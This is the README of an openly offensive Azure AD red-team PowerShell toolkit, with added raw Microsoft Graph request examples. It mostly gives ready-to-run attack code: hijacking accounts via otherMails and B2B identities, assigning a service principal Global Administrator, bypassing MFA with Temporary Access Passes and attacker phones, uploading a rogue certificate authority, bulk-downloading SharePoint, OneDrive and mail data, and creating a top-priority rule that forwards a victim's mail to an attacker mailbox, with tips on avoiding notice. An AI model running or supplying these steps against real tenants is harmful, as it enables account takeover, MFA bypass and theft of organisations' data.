# AbuseAzureAPIPermissions

Abuse Azure API permissions for red teaming.
While reading the blog posts from Andy Robbins and the Black Hat USA 2022 talk from Dirk-jan Mollema, I found that there is a lot of fun to be had with Azure AD application permissions.

This script is useful when:

- The Azure Portal is blocked by the organization, but queries to the Graph API are still allowed through a first-party client app such as "Microsoft Azure PowerShell" or "Azure Active Directory PowerShell". It helps you with recon.
- A privileged account such as Global Admin has been compromised. It helps you persist and collect data by several different means.
- An AAD Sync account [REF], an application owner, an Application Administrator, or a similar principal has been compromised. It lets you add a credential to a service principal and compromise further resources, depending on the permissions that service principal holds.
| Minimum permission | Tactic | Abuse | Abuse function |
|---|---|---|---|
| Application.Read.All | Recon | Search for interesting app role assignments such as RoleManagement.ReadWrite.Directory | Find-AAAInterestingAppRoleAssignment |
| RoleManagement.Read.Directory | Recon | Search for privileged directory role assignments such as Global Admin | Find-AAAInterestingDirectoryRoleAssignment |
| Application.Read.All | Recon | Obtain details of service principals | Get-AAAApplication |
| User.Read.All | Recon | Obtain details of Azure AD users, including registered devices and group memberships | Get-AAAUser |
| GroupMember.Read.All | Recon | Obtain details of Azure AD groups | Get-AAAGroups |
| Application.ReadWrite.All | PE (application), Persistence | Add a credential to an application | New-AAAAppPassword |
| User.ReadWrite.All [REF-Microsoft permission] | PE (non-admin user) | Hijack an Azure AD account by editing the otherMails of the target user to convert it into a B2B user [REF-BlackHat USA 2022] | New-AAAUserOtherMails |
| User.Invite.All + User.ManageIdentities.All | PE (admin user) | Hijack an Azure AD account by adding a B2B identity to the target user | New-AAAUserB2BIdentities |
| RoleManagement.ReadWrite.Directory | PE (admin user), Persistence | Assign a privileged directory role to an application [REF-Andy Robbins] | Set-AAADirectoryRoleMember |
| AppRoleAssignment.ReadWrite.All + Application.Read.All | PE (admin user) | Assign a privileged app role to an application [REF-Andy Robbins] | Set-AAAAppRoleAssignments |
| Policy.ReadWrite.AuthenticationMethod + Organization.ReadWrite.All | PE (admin user), Persistence | Configure certificate-based authentication for the organization [REF-Andy Robbins] | New-AAAUserAuthCert |
| Policy.ReadWrite.AuthenticationMethod + UserAuthenticationMethod.ReadWrite.All | PE (admin user), Defence Evasion (bypass MFA), Persistence | Configure a Temporary Access Pass for a user | Set-AAAUserAuthTempPass |
| Policy.ReadWrite.AuthenticationMethod + UserAuthenticationMethod.ReadWrite.All | Defence Evasion (bypass MFA) | Configure the phone sign-in MFA method for a user | Set-AAAUserAuthPhone |
| Sites.Read.All | Data Collection | Read files in SharePoint | Get-AAAOneDriveFile |
| Files.Read.All | Data Collection | Read files in OneDrive | Get-AAAOneDriveFile |
| Notes.Read.All | Data Collection | Read the content of OneNote notebooks | Get-AAAOneNotesContent |
| Mail.Read | Data Collection | Read the content of emails | Get-AAAEmails |
| MailboxSettings.ReadWrite | Data Collection | Configure a mail forwarding rule for a user | New-AAAEmailRules |
| [REF-Microsoft permission] | Persistence | Reset the password of a user | Set-AAAUserPassword |
## Getting started

### Login with the Az module

```powershell
Install-Module Az
Import-Module .\AbuseAzureAPIPermissions.ps1
# login with an interactive prompt
Get-AAATokenFromAzLogin
# login as a service principal
Get-AAATokenFromAzLogin -User "XXX" -Password "XXX" -TenantId "XXX" -ServicePrincipal
# extract data (tenant, client app, permissions) from the token
Get-AAADataFromGraphToken
```
### Login with the AADInternals module

The AADInternals login path uses the client app "Azure Active Directory PowerShell", while the Az login path uses "Microsoft Azure PowerShell". Both are offered because "Azure Active Directory PowerShell" is the one organizations commonly block (for example through Conditional Access), so having a second first-party client app to authenticate with is useful.

```powershell
Import-Module .\AbuseAzureAPIPermissions.ps1
Import-Module .\AADIntAccessToken\AccessToken.ps1
Import-Module .\AADIntAccessToken\AccessToken_utils.ps1
Import-Module .\AADIntAccessToken\CommonUtils.ps1
# login with an interactive prompt
Get-AAATokenFromAADInt
# login with the device code flow
Get-AAATokenFromAADInt -UseDeviceCode
# refresh an expired token
Get-AAATokenFromAADInt -Refresh
```
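Whichever login path you use, the first thing to check is what the token you hold can actually do. The following is an added example, not code from the AbuseAzureAPIPermissions script: it decodes the claims of a Graph access token offline (no signature check, no network) and separates application permissions (the `roles` claim, which is what the table above keys on) from delegated scopes (the `scp` claim). The token it runs on is constructed inline with a placeholder signature; the tenant, app and object IDs in it are made up, and the "dangerous" list is an assumed shortlist drawn from the table above.

```powershell
# Added example: inspect a Graph access token's claims offline.
function ConvertFrom-Base64Url {
    param([Parameter(Mandatory)][string]$Text)
    $t = $Text.Replace('-', '+').Replace('_', '/')
    switch ($t.Length % 4) { 2 { $t += '==' } 3 { $t += '=' } }
    [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($t))
}

function ConvertTo-Base64Url {
    param([Parameter(Mandatory)][string]$Text)
    [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($Text)).TrimEnd('=').Replace('+', '-').Replace('/', '_')
}

# Assumed shortlist of application permissions that chain into tenant takeover.
$DangerousAppPermissions = @(
    'RoleManagement.ReadWrite.Directory', 'AppRoleAssignment.ReadWrite.All',
    'Application.ReadWrite.All', 'Directory.ReadWrite.All'
)

function Get-GraphTokenSummary {
    param([Parameter(Mandatory)][string]$AccessToken)
    $parts = $AccessToken.Split('.')
    if ($parts.Count -ne 3) { throw 'Not a JWT: expected three dot-separated segments' }
    $claims = ConvertFrom-Base64Url $parts[1] | ConvertFrom-Json

    # A user (delegated) token carries upn/scp; an app-only token carries oid/roles.
    $identity = if ($claims.upn) { $claims.upn } else { "service principal oid=$($claims.oid)" }
    $appPerms = @($claims.roles)
    $scopes   = if ($claims.scp) { @($claims.scp -split ' ') } else { @() }
    $expires  = [DateTimeOffset]::FromUnixTimeSeconds([int64]$claims.exp).UtcDateTime

    [pscustomobject]@{
        Tenant          = $claims.tid
        Audience        = $claims.aud
        ClientAppId     = $claims.appid
        Identity        = $identity
        AppPermissions  = $appPerms
        DelegatedScopes = $scopes
        Dangerous       = @($appPerms | Where-Object { $DangerousAppPermissions -contains $_ })
        ExpiresUtc      = $expires
        Expired         = $expires -lt [DateTime]::UtcNow
    }
}

# Constructed sample token (app-only, unsigned; IDs are placeholders, not a real tenant).
$header  = ConvertTo-Base64Url '{"alg":"RS256","typ":"JWT"}'
$payload = ConvertTo-Base64Url (@{
    aud   = 'https://graph.microsoft.com'
    tid   = '11111111-1111-1111-1111-111111111111'
    appid = '22222222-2222-2222-2222-222222222222'
    oid   = '33333333-3333-3333-3333-333333333333'
    roles = @('Application.Read.All', 'RoleManagement.ReadWrite.Directory')
    exp   = [DateTimeOffset]::UtcNow.AddHours(1).ToUnixTimeSeconds()
} | ConvertTo-Json -Compress)
$sampleToken = "$header.$payload.placeholder-signature"

Get-GraphTokenSummary -AccessToken $sampleToken | Format-List
```

On the constructed token the `Dangerous` field lists `RoleManagement.ReadWrite.Directory`, which is the same signal `Find-AAAInterestingAppRoleAssignment` looks for tenant-wide; here it is applied to the single token in hand, which is worth doing before any further call because a token whose `roles` claim is empty only has the delegated rights of the signed-in user.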
## Recon

### App role assignment

Permission (any of): Application.Read.All, Application.ReadWrite.OwnedBy, Directory.Read.All, Application.ReadWrite.All, Directory.ReadWrite.All

Search for any interesting app role (e.g., Files.Read.All) assigned to a service principal:

```powershell
Find-AAAInterestingAppRoleAssignment -Application
Find-AAAInterestingAppRoleAssignment -ServicePrinciple
Get-AAAAppRoleAssignments -AppId 'XXXX' -Readable
```
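The Graph objects behind this search return only the `appRoleId` GUID, so the work is in mapping GUIDs back to permission names. The block below is an added example and not the script's own implementation of `Find-AAAInterestingAppRoleAssignment`: it pages through a service principal's `appRoleAssignments`, resolves names from the Microsoft Graph service principal's own `appRoles` list when a token is available, and flags assignments from an assumed shortlist of dangerous permissions. The `$Token` and `$ServicePrincipalId` inputs are assumed; the final call runs on a constructed sample in the shape Graph returns, so it works offline, and the hard-coded GUID table should be verified against your tenant's Graph service principal.

```powershell
# Added example: enumerate and triage a service principal's Graph app role assignments.
$GraphBase = 'https://graph.microsoft.com/v1.0'

# Assumed shortlist of application permissions that chain into tenant takeover.
$DangerousAppPermissions = @(
    'RoleManagement.ReadWrite.Directory', 'AppRoleAssignment.ReadWrite.All',
    'Application.ReadWrite.All', 'Directory.ReadWrite.All'
)

function Get-GraphAppRoleNames {
    # Build appRoleId -> permission name from the Microsoft Graph service principal
    # (appId 00000003-0000-0000-c000-000000000000) in the current tenant.
    param([Parameter(Mandatory)][string]$Token)
    $h = @{ Authorization = "Bearer $Token" }
    $uri = "$GraphBase/servicePrincipals?`$filter=appId eq '00000003-0000-0000-c000-000000000000'&`$select=id,appRoles"
    $sp = (Invoke-RestMethod -Method Get -Uri $uri -Headers $h).value[0]
    $map = @{}
    foreach ($r in $sp.appRoles) { $map[$r.id] = $r.value }
    $map
}

function Get-SpAppRoleAssignments {
    # All app roles granted TO a service principal, following @odata.nextLink paging.
    param([Parameter(Mandatory)][string]$Token, [Parameter(Mandatory)][string]$ServicePrincipalId)
    $h = @{ Authorization = "Bearer $Token" }
    $uri = "$GraphBase/servicePrincipals/$ServicePrincipalId/appRoleAssignments"
    $all = @()
    while ($uri) {
        $page = Invoke-RestMethod -Method Get -Uri $uri -Headers $h
        $all += $page.value
        $uri = $page.'@odata.nextLink'
    }
    $all
}

function Find-DangerousAppRoles {
    param([Parameter(Mandatory)][object[]]$Assignments, [Parameter(Mandatory)][hashtable]$RoleNames)
    foreach ($a in $Assignments) {
        $name = $RoleNames[$a.appRoleId]
        if (-not $name) { $name = "unknown ($($a.appRoleId))" }   # role on a non-Graph resource, or stale table
        [pscustomobject]@{
            Principal  = $a.principalDisplayName
            Resource   = $a.resourceDisplayName
            Permission = $name
            Dangerous  = $DangerousAppPermissions -contains $name
        }
    }
}

# Offline table of well-known Microsoft Graph application permission IDs
# (assumption: verify against Get-GraphAppRoleNames in your tenant).
$OfflineRoleNames = @{
    '9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8' = 'RoleManagement.ReadWrite.Directory'
    '06b708a9-e830-4db3-a914-8e69da51d44f' = 'AppRoleAssignment.ReadWrite.All'
    '1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9' = 'Application.ReadWrite.All'
    '19dbc75e-c2e2-444c-a770-ec69d8559fc7' = 'Directory.ReadWrite.All'
    '9492366f-7969-46a4-8d15-ed1a20078fff' = 'Sites.ReadWrite.All'
    '01d4889c-1287-42c6-ac1f-5d1e02578ef6' = 'Files.Read.All'
    '9a5d68dd-52b0-4cc2-bd40-abcf44ac3a30' = 'Application.Read.All'
}

# Constructed sample assignments (not real tenant data) in the shape Graph returns.
$sampleAssignments = @(
    @{ principalDisplayName = 'BackupApp';   resourceDisplayName = 'Microsoft Graph'; appRoleId = '01d4889c-1287-42c6-ac1f-5d1e02578ef6' },
    @{ principalDisplayName = 'HelpdeskBot'; resourceDisplayName = 'Microsoft Graph'; appRoleId = '9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8' }
) | ForEach-Object { [pscustomobject]$_ }

Find-DangerousAppRoles -Assignments $sampleAssignments -RoleNames $OfflineRoleNames | Format-Table

# Live use (assumed inputs): 
# $names = Get-GraphAppRoleNames -Token $Token
# Find-DangerousAppRoles -Assignments (Get-SpAppRoleAssignments -Token $Token -ServicePrincipalId $ServicePrincipalId) -RoleNames $names
```

In the constructed sample only `HelpdeskBot` is flagged. Note that `Directory.Read.All` is enough to list every service principal's assignments, so this triage runs with the lowest-privileged token in the table above.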
### Directory role assignment

Permission (any of): RoleManagement.Read.Directory, Directory.Read.All, RoleManagement.ReadWrite.Directory, Directory.ReadWrite.All

Search for privileged directory role (e.g., Global Admin) assignments:

```powershell
Find-AAAInterestingDirectoryRoleAssignment -ServicePrinciple
Find-AAAInterestingDirectoryRoleAssignment -User
Find-AAAInterestingDirectoryRoleAssignment -Guest
# Application Administrator role template
$AppAdminTemplateId = "9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3"
Get-AAADirectoryRoleMember -RoleTemplateId $AppAdminTemplateId -filter ServicePrinciple
```
### Application

Permission (any of): Application.Read.All, Application.ReadWrite.OwnedBy, Application.ReadWrite.All, Directory.Read.All, Directory.ReadWrite.All

Get the details (e.g., app URL, owner) of service principals:

```powershell
Get-AAAApplication
Get-AAAApplication -ServicePrinciple -AppId 'XXXX'
Get-AAAApplication -Application -Search "citrix"
```
### User

Permission (any of): User.Read.All, User.ReadWrite.All, Directory.Read.All, Directory.ReadWrite.All

Get the details (e.g., registered devices, group memberships) of a user:

```powershell
Get-AAAUser
Get-AAAUser -UserId "[email protected]"
Get-AAAUser -Search "sync" # search for the AAD Connect sync service account
Get-AAAUserDevices -UserId "[email protected]"
Get-AAAUserMemberOf -UserId "[email protected]"
```

Permission (any of): UserAuthenticationMethod.Read.All, UserAuthenticationMethod.ReadWrite.All

Get the registered authentication methods of a user:

```powershell
Get-AAAUserAuthMethod -UserId "[email protected]"
```
### Group

Permission (any of): GroupMember.Read.All, Group.Read.All, Directory.Read.All, Group.ReadWrite.All, Directory.ReadWrite.All

Get the details of groups and their members:

```powershell
Get-AAAGroups
Get-AAAGroups -Search "helpdesk"
Get-AAAGroupMembers -GroupId "XXX"
```
## Privilege Escalation

### Add credential to application (PE to application)

Permission: Application.ReadWrite.All

Add a password credential to an application's service principal, then authenticate as that service principal and inherit whatever app roles and directory roles it already holds:

```powershell
New-AAAAppPassword -ServicePrinciple -AppId 'XXXX'
# Clean up
Remove-AAAAppPassword -ServicePrinciple -AppId 'XXXX' -KeyId 'XXXX'
```
### Hijack Azure AD account - otherMails property (PE to non-admin user)

Permission: User.ReadWrite.All, Directory.ReadWrite.All (applies to non-admin users only)

Permission of privileged directory role: [REF-Microsoft permission]

Hijack a normal Azure AD account (a member without a mailbox) by setting the mail and otherMails of the target user to an attacker-controlled address and sending or resetting the B2B invitation, which converts the account into a B2B user that the attacker redeems [REF-BlackHat USA 2022].

```powershell
# Hijack a member without a mailbox
$victim = "[email protected]"
$attackerMail = "[email protected]"
$DisplayName = "Tommy Cheung"
Set-AAAUserMail -UserId $victim -mail $attackerMail
New-AAAUserOtherMails -UserId $victim -otherMails $attackerMail
Send-AAAB2BInvitation -action resendInvitation -UserId $victim -mail $attackerMail
Set-AAAUserDisplayname -UserId $victim -DisplayName $DisplayName
(Get-AAAUser -UserId $victim).identities

# Hijack a guest account
$victim = "XXX"
$attackerMail = "[email protected]"
Set-AAAUserMail -UserId $victim -mail $attackerMail
New-AAAUserOtherMails -UserId $victim -otherMails $attackerMail
Send-AAAB2BInvitation -action resetRedemption -UserId $victim -mail $attackerMail

# Hijack a member that has already been converted to a B2B user
$victim = "[email protected]"
$attackerMail = "[email protected]"
Set-AAAUserMail -UserId $victim -mail $attackerMail
Remove-AAAUserOtherMails -UserId $victim -otherMails $attackerMail
New-AAAUserOtherMails -UserId $victim -otherMails $attackerMail
Send-AAAB2BInvitation -action resetRedemption -UserId $victim -mail $attackerMail

# Clean up
Set-AAAUserMail -UserId "[email protected]" -mail "[email protected]"
Remove-AAAUserOtherMails -UserId "[email protected]" -otherMails "[email protected]"
```
### Hijack Azure AD account - identities property (PE to admin user)

Permission for inviting a user (any of): User.Invite.All, User.ReadWrite.All, Directory.ReadWrite.All

Permission for adding new identities: User.ManageIdentities.All (applies to all users), Directory.ReadWrite.All (applies to non-admin users only)

Permission for cleaning up: User.Read.All + User.ManageIdentities.All (applies to all users), Directory.ReadWrite.All (applies to non-admin users only)

Hijack a privileged Azure AD account (a member with or without a mailbox) by adding a B2B identity for an attacker-controlled address to the target user and then sending the invitation to that address:

```powershell
# Hijack a member with or without a mailbox
$victim = "[email protected]"
$attackerMail = "[email protected]"
New-AAAUserB2BIdentities -UserId $victim -mail $attackerMail
Send-AAAB2BInvitation -action sendInvitation -mail $attackerMail -Displayname "Tommy Cheung"
# Clean up
Remove-AAAUserB2BIdentities -UserId "[email protected]" -mail "[email protected]"
```
### Assign directory role (PE to admin user)

Permission: RoleManagement.ReadWrite.Directory

Assign a privileged directory role (e.g., Global Admin) to a target object [REF-Andy Robbins]:

```powershell
$TargetObjectId = "XXXX"
# Global Administrator role template
$GlobalAdminTemplateId = "62e90394-69f5-4237-9190-012177145e10"
Set-AAADirectoryRoleMember -RoleTemplateId $GlobalAdminTemplateId -TargetObjectId $TargetObjectId
# Clean up
Remove-AAADirectoryRoleMember -RoleTemplateId $GlobalAdminTemplateId -TargetObjectId $TargetObjectId
```
### Assign app role (PE to admin user)

Permission: AppRoleAssignment.ReadWrite.All together with either Application.Read.All or Directory.Read.All

Assign a privileged application role (e.g., RoleManagement.ReadWrite.Directory) to a target service principal [REF-Andy Robbins]:

```powershell
# Assign "Sites.ReadWrite.All" to a specific application to access all SharePoint sites and OneDrive
Set-AAAAppRoleAssignments -AppId 'XXXX' -AppRoleId "9492366f-7969-46a4-8d15-ed1a20078fff"

# Assign "RoleManagement.ReadWrite.Directory" to the current application, then assign the Global Admin role to itself
$CurrentAppId = "XXXX"
$CurrentObjectId = (Get-AAAApplication -ServicePrinciple -AppId $CurrentAppId).id
$GlobalAdminTemplateId = "62e90394-69f5-4237-9190-012177145e10"
Set-AAAAppRoleAssignments -AppId $CurrentAppId -AppRoleId "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8"
Set-AAADirectoryRoleMember -RoleTemplateId $GlobalAdminTemplateId -TargetObjectId $CurrentObjectId

# Clean up
Remove-AAAAppRoleAssignments -AppId "XXXX" -AssignId "XXXX"
Remove-AAADirectoryRoleMember -RoleTemplateId $GlobalAdminTemplateId -TargetObjectId $CurrentObjectId
```

Note that an app role grant is not reflected in tokens that were issued before it; acquire a new token for the application before using the newly granted permission.
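To make it clear what the two permissions above actually let a caller do, here is the chain as raw Graph requests. This is an added example, not the script's implementation of `Set-AAAAppRoleAssignments` or `Set-AAADirectoryRoleMember`. `$Token` (a token carrying AppRoleAssignment.ReadWrite.All) and `$TargetSpId` (the object id of the service principal being escalated) are assumed inputs; the role and permission GUIDs are the well-known ones already used in this section, and `$TargetSpToken` stands for a token obtained for the target service principal after step 2.

```powershell
# Added example: app role grant followed by self-assignment of Global Administrator, as raw Graph calls.
$Graph   = 'https://graph.microsoft.com/v1.0'
$Headers = @{ Authorization = "Bearer $Token"; 'Content-Type' = 'application/json' }

# 1. App role assignments reference the object id of the Microsoft Graph service
#    principal in THIS tenant (resourceId), not Graph's global appId.
$graphSp = (Invoke-RestMethod -Method Get -Headers $Headers -Uri `
    "$Graph/servicePrincipals?`$filter=appId eq '00000003-0000-0000-c000-000000000000'&`$select=id").value[0]

# 2. Grant RoleManagement.ReadWrite.Directory to the target service principal.
#    Requires AppRoleAssignment.ReadWrite.All; no admin consent prompt is involved.
$grant = @{
    principalId = $TargetSpId
    resourceId  = $graphSp.id
    appRoleId   = '9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8'   # RoleManagement.ReadWrite.Directory
} | ConvertTo-Json
$assignment = Invoke-RestMethod -Method Post -Headers $Headers -Body $grant `
    -Uri "$Graph/servicePrincipals/$TargetSpId/appRoleAssignments"

# 3. Using a NEW token for the target service principal (the grant is not in old
#    tokens), add it to Global Administrator through the unified role management
#    API. This works whether or not the role has been activated in the tenant.
$TargetHeaders = @{ Authorization = "Bearer $TargetSpToken"; 'Content-Type' = 'application/json' }
$roleAssignment = @{
    '@odata.type'    = '#microsoft.graph.unifiedRoleAssignment'
    principalId      = $TargetSpId
    roleDefinitionId = '62e90394-69f5-4237-9190-012177145e10'   # Global Administrator
    directoryScopeId = '/'
} | ConvertTo-Json
$ga = Invoke-RestMethod -Method Post -Headers $TargetHeaders -Body $roleAssignment `
    -Uri "$Graph/roleManagement/directory/roleAssignments"

# Clean up: both assignments are deleted by their own ids.
Invoke-RestMethod -Method Delete -Headers $TargetHeaders -Uri "$Graph/roleManagement/directory/roleAssignments/$($ga.id)"
Invoke-RestMethod -Method Delete -Headers $Headers -Uri "$Graph/servicePrincipals/$TargetSpId/appRoleAssignments/$($assignment.id)"
```

Both POSTs are recorded in the Azure AD audit log ("Add app role assignment to service principal" and "Add member to role"), which is what a defender should be alerting on; from the offensive side, the point is that neither step requires a Global Administrator to have consented to anything.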
### Configure certificate-based authentication (PE to admin user)

Permission for configuring the authentication method policy: Policy.ReadWrite.AuthenticationMethod

Permission for configuring certificate-based authentication (uploading the CA): Organization.ReadWrite.All

Configure certificate-based authentication for the organization, upload an attacker-controlled CA, and mint a user certificate from it [REF-Andy Robbins]. For the sign-in to succeed the certificate must map to the target user; by default Azure AD matches the PrincipalName or RFC822Name in the certificate's subject alternative name to the user's userPrincipalName.

```powershell
# Enable the certificate-based authentication method for the organization
Set-AAAAutenMethod -CertAuth
# Generate the CA certificate on a Linux host: ./AAAUserAuthCert.sh -g crt
# then upload it as a trusted CA for the tenant
New-AAAUserAuthCert -CertFile ".\ca.crt"
# Generate a PFX for the target user on the Linux host, signed by that CA:
# ./AAAUserAuthCert.sh -g pfx -u [email protected] -s "/C=AU/ST=XX/L=XX/O=XXX/OU=IT/[email protected]"
# Install the PFX in the local certificate store to sign in as that user.
# Clean up
Set-AAAAutenMethod -CertAuth -Disable
Remove-AAAUserAuthCert -issuerSki "XXXX"
```
### Configure Temporary Access Pass (PE to admin user, bypass MFA)

Permission for configuring the authentication method policy: Policy.ReadWrite.AuthenticationMethod

Permission for issuing a Temporary Access Pass: UserAuthenticationMethod.ReadWrite.All

Configure a Temporary Access Pass for a user. A TAP satisfies MFA on its own, so it lets you sign in as the target without their password or registered methods:

```powershell
Set-AAAAutenMethod -TempPass
Set-AAAUserAuthTempPass -UserId "[email protected]"
# Clean up
Remove-AAAUserAuthTempPass -UserId "[email protected]" -TempPassId "XXXX"
Set-AAAAutenPolicy -TempPass -Disable
```
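The two Graph calls behind this, as an added example rather than the script's own `Set-AAAAutenMethod` / `Set-AAAUserAuthTempPass` code: first the method policy is switched on and scoped to all users (the pass cannot be issued while the method is disabled for the target), then a one-time pass is created for the user. `$Token` and `$Victim` (a UPN or object id) are assumed inputs.

```powershell
# Added example: enable the TAP method tenant-wide and issue a one-time pass.
$Graph   = 'https://graph.microsoft.com/v1.0'
$Headers = @{ Authorization = "Bearer $Token"; 'Content-Type' = 'application/json' }

# 1. Policy.ReadWrite.AuthenticationMethod: turn the method on for all users.
$policy = @{
    '@odata.type'            = '#microsoft.graph.temporaryAccessPassAuthenticationMethodConfiguration'
    state                    = 'enabled'
    includeTargets           = @(@{ targetType = 'group'; id = 'all_users'; isRegistrationRequired = $false })
    isUsableOnce             = $false     # tenant default; per-pass value below overrides it
    defaultLifetimeInMinutes = 60
    maximumLifetimeInMinutes = 480
} | ConvertTo-Json -Depth 5
Invoke-RestMethod -Method Patch -Headers $Headers -Body $policy `
    -Uri "$Graph/policies/authenticationMethodsPolicy/authenticationMethodConfigurations/TemporaryAccessPass"

# 2. UserAuthenticationMethod.ReadWrite.All: create the pass. The secret value is
#    returned only in this response, so capture it immediately.
$request = @{ lifetimeInMinutes = 60; isUsableOnce = $true } | ConvertTo-Json
$tap = Invoke-RestMethod -Method Post -Headers $Headers -Body $request `
    -Uri "$Graph/users/$Victim/authentication/temporaryAccessPassMethods"
"TAP for ${Victim}: $($tap.temporaryAccessPass) (valid until $($tap.startDateTime) + $($tap.lifetimeInMinutes) min)"

# Clean up: remove the pass, then disable the method again.
Invoke-RestMethod -Method Delete -Headers $Headers `
    -Uri "$Graph/users/$Victim/authentication/temporaryAccessPassMethods/$($tap.id)"
$off = @{ '@odata.type' = '#microsoft.graph.temporaryAccessPassAuthenticationMethodConfiguration'; state = 'disabled' } | ConvertTo-Json
Invoke-RestMethod -Method Patch -Headers $Headers -Body $off `
    -Uri "$Graph/policies/authenticationMethodsPolicy/authenticationMethodConfigurations/TemporaryAccessPass"
```

Keep `isUsableOnce = $true` on the pass itself unless you need repeated sign-ins: a multi-use pass left behind is a credential the target's own helpdesk can find in the user's authentication methods, and the policy change in step 1 is itself audited, so the clean-up matters as much as the issue.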
## Defence Evasion

### Configure phone sign-in MFA (bypass MFA)

Permission for configuring the authentication method policy: Policy.ReadWrite.AuthenticationMethod

Permission for registering a phone for a user: UserAuthenticationMethod.ReadWrite.All

Register an attacker-controlled phone number as the SMS sign-in / MFA method of a user:

```powershell
Set-AAAAutenMethod -sms
Set-AAAUserAuthPhone -UserId "[email protected]" -phoneNumber "+852XXXXXXX"
# Clean up
Remove-AAAUserAuthPhone -UserId "[email protected]" -phoneNumber "+852XXXXXXX"
Set-AAAAutenPolicy -sms -Disable
```
## Data Collection

### SharePoint

Permission (any of): Sites.Read.All, Sites.ReadWrite.All, Sites.Manage.All, Sites.FullControl.All

List details of, and download items from, a SharePoint site:

```powershell
Get-AAASite
Get-AAAOneDriveFolder -SitetId "XXXX"
Get-AAAOneDriveFolder -SitetId "XXXX" -FolderId "XXXX" -showDetails
Get-AAAOneDriveFolder -SitetId "XXXX" -FolderId "XXXX" -recurse | Export-Csv -Encoding UTF8 Result.csv
Get-AAAOneDriveFolder -SitetId "XXXX" -FolderId "XXXX" -Parent
Get-AAAOneDriveFolder -SitetId "XXXX" -FileId "XXXX" -Download
```
### OneDrive

Permission (any of): Files.Read.All, Files.ReadWrite.All, Sites.Read.All, Sites.ReadWrite.All, Sites.Manage.All, Sites.FullControl.All

List details of, and download items from, the OneDrive of a user:

```powershell
Get-AAAOneDriveFolder -UserId "[email protected]"
Get-AAAOneDriveFolder -UserId "[email protected]" -FolderId "XXXX"
Get-AAAOneDriveFolder -UserId "[email protected]" -FileId "XXXX" -Download
```
### OneNote

Permission (any of): Notes.Read.All, Notes.ReadWrite.All

List details of, and download, the OneNote pages of a user:

```powershell
Get-AAAOneNotes -UserId "[email protected]"
Get-AAAOneNotesContent -UserId "[email protected]" -PageId "XXXX" -OutHTMLFile output.html
```
### Email

Permission (any of): Mail.Read, Mail.ReadWrite

Read emails and download attachments from a mailbox:

```powershell
Get-AAAEmails -UserId "[email protected]"
Get-AAAEmails -UserId "[email protected]" -Search "password" -Top 7
Get-AAAEmails -UserId "[email protected]" -MessageId "XXXX"
Get-AAAEmailAttachments -UserId "[email protected]" -MessageId "XXXX"
Get-AAAEmailAttachments -UserId "[email protected]" -MessageId "XXXX" -AttachmentId "XXXX"
```
### Create mail rule

Permission: MailboxSettings.ReadWrite

Create a mail rule with the highest precedence that forwards all email of a mailbox. Be aware that creation of a rule forwarding mail to an external mailbox is a commonly detected and alerted event:

```powershell
$victim = "[email protected]"
$attackerMail = "[email protected]"
Get-AAAEmailRules -UserId $victim
New-AAAEmailRules -UserId $victim -MailRuleDisplayName "Reporting Rule" -EmailDisplayName "Tommy Cheung (IT)" -Email $attackerMail
# Clean up
Remove-AAAEmailRules -UserId $victim -MailRuleId "XXXX"
```
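Because this is the noisiest action on the page, it is worth seeing both the request `New-AAAEmailRules` wraps and a way to read the mailbox's existing rules first, since a rule that already forwards externally tells you both that the policy allows it and that the mailbox may already be watched. The block below is an added example, not the script's code: `Get-ExternalForwardingRules` triages rules for forward/redirect actions to addresses outside an assumed internal domain, and the POST creates the sequence-1 rule. `$Token`, `$Victim`, `$AttackerMail` and the internal domain are assumed inputs; the triage is first run on a constructed sample so it can be checked offline.

```powershell
# Added example: inspect existing forwarding rules, then create a top-priority forwarding rule.
$Graph    = 'https://graph.microsoft.com/v1.0'
$Headers  = @{ Authorization = "Bearer $Token"; 'Content-Type' = 'application/json' }
$RulesUri = "$Graph/users/$Victim/mailFolders/inbox/messageRules"

function Get-ExternalForwardingRules {
    param([Parameter(Mandatory)][object[]]$Rules, [Parameter(Mandatory)][string]$InternalDomain)
    foreach ($r in $Rules) {
        # Every action type that sends a copy or the message itself somewhere else.
        $targets = @($r.actions.forwardTo) + @($r.actions.forwardAsAttachmentTo) + @($r.actions.redirectTo)
        foreach ($t in $targets) {
            $addr = $t.emailAddress.address
            if ($addr -and -not $addr.EndsWith("@$InternalDomain", [StringComparison]::OrdinalIgnoreCase)) {
                [pscustomobject]@{ Rule = $r.displayName; Sequence = $r.sequence; Enabled = $r.isEnabled; ForwardsTo = $addr }
            }
        }
    }
}

# Constructed sample rules (not real data) in the shape Graph returns.
$sampleRules = @(
    @{ displayName = 'Move newsletters'; sequence = 2; isEnabled = $true
       actions = @{ moveToFolder = 'abc' } },
    @{ displayName = 'Backup'; sequence = 1; isEnabled = $true
       actions = @{ forwardTo = @(@{ emailAddress = @{ name = 'Archive'; address = 'archive@external.example' } }) } }
) | ForEach-Object { [pscustomobject]$_ }
Get-ExternalForwardingRules -Rules $sampleRules -InternalDomain 'victim-tenant.example' | Format-Table

# Live: existing rules of the victim (MailboxSettings.Read suffices for this read).
$existing = (Invoke-RestMethod -Method Get -Headers $Headers -Uri $RulesUri).value
Get-ExternalForwardingRules -Rules $existing -InternalDomain 'victim-tenant.example' | Format-Table

# Create the forwarding rule. sequence = 1 evaluates first; no conditions means every message.
$rule = @{
    displayName = 'Reporting Rule'
    sequence    = 1
    isEnabled   = $true
    actions     = @{
        forwardTo           = @(@{ emailAddress = @{ name = 'Tommy Cheung (IT)'; address = $AttackerMail } })
        stopProcessingRules = $false   # let the victim's own rules still run, so nothing looks different
    }
} | ConvertTo-Json -Depth 6
$created = Invoke-RestMethod -Method Post -Headers $Headers -Body $rule -Uri $RulesUri

# Clean up
Invoke-RestMethod -Method Delete -Headers $Headers -Uri "$RulesUri/$($created.id)"
```

On the constructed sample only the "Backup" rule is reported. Whether forwarded mail actually leaves the tenant also depends on Exchange Online's outbound spam filter policy, whose automatic forwarding setting Microsoft now disables by default, so confirm delivery to the attacker mailbox rather than assuming the rule worked.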
## Persistence

### Reset password

Permission of privileged directory role: [REF-Microsoft permission]

Change the password of a user:

```powershell
Set-AAAUserPassword -UserId "[email protected]" -password "P@ssw0rd@1112233"
```
## References

- https://github.com/Gerenios/AADInternals
